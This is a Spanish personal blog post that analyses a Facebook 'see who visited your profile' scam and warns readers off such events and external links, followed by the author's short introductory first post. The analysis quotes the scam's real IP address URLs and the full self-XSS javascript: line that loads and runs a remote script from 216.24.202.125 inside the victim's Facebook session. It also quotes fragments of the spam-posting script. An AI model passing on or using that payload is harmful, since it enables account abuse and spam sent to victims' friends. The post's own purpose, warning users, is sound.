    Para empezar, en mi opinión a facebook no le interesa que sepamos ni quién nos visita ni cuántas veces lo hace, es el morbo que tiene esto de las redes sociales, a parte de poder estar en contacto con tus amigos y blablabla lo que hacemos todos es cotillear a la gente sin que lo sepan ,vamos cotilleando de amigo/a en amigo/a como si fuéramos invisibles. Es más, ¿Creéis que si a facebook le interesara mostrarnos quién, cuándo y cuántas veces nos visita alguien no lo habría hecho ya?

    

    ¿Dónde quiero llegar con todo esto? Sencillo, tan sólo quiero intentar mentalizar a la gente de que desconfíe con eventos del tipo de que si no clickas aquí se te cerrará facebook, que si no clickas allá ahora el facebook se hará de pago y tendremos que pagar a partir de tal fecha, que si clickas por allí podrás ver las visitas a tu perfil, y un largo etc. Para ello he hecho el siguiente análisis para que veáis que la mayoría de eventos de este tipo sólo son mas que engaños. Además, si facebook hace algún cambio importante tranquilos que ya se encargarán ellos de avisarnos.

    


    

    Bueno, después de este pequeño inciso, continuo:
    Iba diciendo que esta mañana he visto a unos cuantos amiguetes que han hecho caso a eso de:
    Descubre a quién visto tu perfil @ http://216.119.148.83/spy.php
    Como me ha parecido un poco sospechoso me he puesto a investigar.

    

    He empezado activando NoScript (una extensión muy recomendada para Mozilla Firefox) para evitar sustos, ya que suponiendo que sea una url maligna no seria de extrañar que haya algún script con malas intenciones en el código. [llámenme paranoico si quieren...  al menos no voy enviando 200 peticiones a eventos sin que lo sepa ;) ]
    Bien, seguidamente, para protegerme todavía mas, he cerrado la sesión del facebook por si las moscas, ya que soy muy novato y no tengo mucha idea, no vaya a ser que haya alguna otra manera de que puedan conseguir mi csfr. (El csfr, es como nuestro dni, te asignan uno nuevo cada vez que iniciamos sesión en facebook, digamos que es como si nuestro "cuño" para poder entrar a nuestra "discoteca facebook", sin ese cuño no nos dejarían tener acceso a lo que hay dentro del la disco).

    

    Una vez hecho esto, al fin, me he atrevido a entrar en http://216.119.148.83/ y he cotilleado un poco los archivos que tienen alojados en este servidor, primero de todo he ido a analizar el código del archivo spy.php (ya que es esta la dirección a la que nos piden que entremos).

    

    En el código de spy.php se puede observar lo siguiente:
    ...
      <script language="javascript" src="http://j.maxmind.com/app/geoip.js"></script>
    ...
    var country = geoip_country_code();
    ...
    case (country = "ES"):
      window.location = "http://spanish-landing.blogspot.com/"
    ...
    ...
    Sólo he copiado parte del código, pero se puede ver que se llama a la función geoip_country_code() del archivo geoip.js para que coja nuestra ip y averigüe de dónde somos y que dependiendo de dónde seamos nos envíe a una dirección u otra, en el caso de que estemos conectados desde España (obviamente, sin utilizar proxys =P) nos envía a un blog en español (he mirado todas las webs que había y lo único que cambiaban una de otra era el idioma de la web).
    Como podéis imaginar he entrado en ese blog para ver que había, me he encontrado con una web con nos pedía que copiáramos un script en nuestra barra de direcciones para "para ver quién ha estado acechando a su perfil" (quién ha escrito este blog no debe de ser español, se nota que ha utilizado un traductor a pelo y listo)
    El script que nos pide que copiemos y ejecutemos es el siguiente:

    

    javascript:(a=(b=document).createElement('script')).src='//216.24.202.125/s.php?'+Math.random(),b.body.appendChild(a);void(0)

    

    Obviamente yo no lo he hecho, tan sólo me he puesto a analizar que pasaría si copiáramos este script y lo pegáramos en nuestra barra de direcciones como nos pide nuestra querida web que inspira tanta confianza... ejem ejem...

    

    En este código javascript me ha llamado la atención dos cosas: primero que nos manda otra vez al servidor que antes estábamos analizando para que se ejecute el código de 216.24.202.125/s.php?' y en segundo lugar que de parámetro de entrada estuviera esto: Math.random() (un número aleatorio).
    Así pues, me he puesto a ver el código fuente de s.php y me he encontrado con esto:  
    (Os dejo sólo una parte del código:)
      
    ...
var test = 'Catálogo Mi Perfil Visualizadores:\x0A'; 
var id = '%tf%    - ' + randomnumber1 + ' vistas,\x0A';
var id1 = '%tf%    - ' + randomnumber2 + ' vistas,\x0A';
var id2 = '%tf%    - ' + randomnumber3 + ' vistas,\x0A';
var id3 = '%tf%    - ' + randomnumber4 + ' vistas,\x0A';
var post = ' Descubre a quién visto tu perfil @ ';
...
var nfriends = 5000;
...
    ¡Eureka! ¿No os suena?
    En una parte del código se puede ver que los nombres son 4 nombres al azar de nuestra lista de contactos y las visitas... para que hablar, el propio nombre de la variable lo dice: RANDOM!!!!! (aleatorio en ingles xD), ahora es cuando nos cuadra que en el script que ejecutábamos hubiera un Math.random(), lo más probable es que sea para a partir de ese número poder generar los 4 números aleatorios de las visitas. (Tan sólo es una suposición.)
    (nfriends = 5000 supongo que debe de ser para crear una tabla de 5000 elementos y almacenar en ella 5000 nombres de contactos como máximo)

    

    Otro aspecto importante a nombrar es que los que me han invitado a ese evento habían invitado a todos sus contactos, supongo que, tal y como el script va recorriendo nuestros amigos debe recoger el id de estos y debe de enviarles una petición automática sin nuestra autorización y sin que lo sepamos.

    


    

    Así que ya sabéis, no os fiéis nada de:
    • Los enlaces externos de facebook.   
      

      • 

    • Los eventos que crea la gente diciéndonos que el facebook va  a ser de pago, que se va a cerrar el facebook, que vas a poder ver  el facebook con coloringos chulis o que vas a saber quién te está  visitando.   
      

      • 

    • Algunas de las aplicaciones de entretenimiento que crea la  gente, ya que lo que hacen algunas de ellas es enviarte a un enlace  externo sin que lo sepas, ¿Y qué acabo de recomendar sobre los  enlaces externos...?   
      

      • 

    Y aquí concluyo con mi primer escrito.
    Gracias a quien haya leído todo esto y espero que a alguien le haya sido de utilidad.
    También quiero pedir perdón si he cometido alguna falta de ortografía o si me estoy equivocando en algo de lo que he dicho, observar que he usado bastante las palabras "supongo que...".
    Gracias de nuevo y saludos. =)

    


    

    p.d: Mientras estaba escribiendo este texto me han llegado DOS invitaciones mas al evento "WOW ahora facebook le permite ver quién ve tu perfil!". No perdáis el tiempo con estas estafas!
    

    

    

    

    
Publicado por
ferro


en
23:55


5
comentarios









    


    

    

    


    

    


    

    

    

    

    

    


    
Mi primer blog.

    

    

    

    

    

    Buenas a todos,  he aquí mi primer blog con el que podréis entreteneros en vuestros ratos libres.
    Ya hace bastante tiempo que quería tachar de mi lista mental de "tareas pendientes" el crearme un blog y escribir en él cosillas que vaya investigando, que me parezcan curiosas o simplemente que me apetezca poner.

    

    La verdad es que mi intención no es que este blog tenga cientos de visitas diarias, lo he creado sobre todo para forzarme a escribir de vez en cuando y así mejorar la forma en la que me expreso, intentar tener menos faltas de ortografía y ya de paso mostraros cosas interesantes, supongo que todas ellas tendrán que ver con el mundo de la informática.

    

    Respecto a la periodicidad de escritura en este blog... soy un chico bastante curioso y me gusta investigar sobre todo tipo de temas, pero de ahí a que me ponga explicar todo en el blog... no prometo nada, sobre la marcha. =) 

    

    Un saludo y espero que os guste.
    

    

    

    

    
Publicado por
ferro


en
23:31


0
comentarios









    


    

    

    


    

    


    

    

    

    

        
    
      


    


    

    

    
Suscribirse a:
Entradas (Atom)